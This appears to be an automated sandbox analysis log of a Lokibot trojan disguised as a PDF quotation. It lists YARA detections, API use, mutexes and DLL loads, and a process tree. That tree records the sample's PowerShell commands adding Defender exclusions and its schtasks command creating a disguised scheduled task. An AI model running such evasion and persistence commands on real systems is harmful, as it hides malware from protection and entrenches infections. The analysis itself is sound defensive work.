                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Quotation2025-0107pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: mexnJkivovwH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, G6M6jnkKXAxGXHKNmU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, G6M6jnkKXAxGXHKNmU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, G6M6jnkKXAxGXHKNmU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/17@0/1
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,13_2_0040434D
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2404.tmpJump to behavior
                    Source: Quotation2025-0107pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Quotation2025-0107pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile read: C:\Users\user\Desktop\Quotation2025-0107pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
